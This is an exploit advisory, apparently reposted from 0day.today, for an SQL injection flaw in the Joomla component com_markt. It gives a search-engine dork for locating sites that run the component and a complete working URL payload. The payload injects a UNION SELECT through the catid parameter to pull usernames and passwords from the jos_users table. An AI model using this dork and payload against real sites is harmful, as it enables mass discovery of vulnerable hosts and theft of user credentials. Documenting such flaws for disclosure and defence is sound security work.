id: 14778
date: 11/10/2010
title: Joomla Component com_markt SQL Injection Vulnerability
author: CoBRa_21
cves: 

======================================================
Joomla Component com_markt SQL Injection Vulnerability
======================================================

################################################################################################################
Author : CoBRa_21
Dork : inurl:com_markt
################################################################################################################
Sql Injection :
http://localhost/[path]/index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
################################################################################################################



#  0day.today [2023-03-27]  #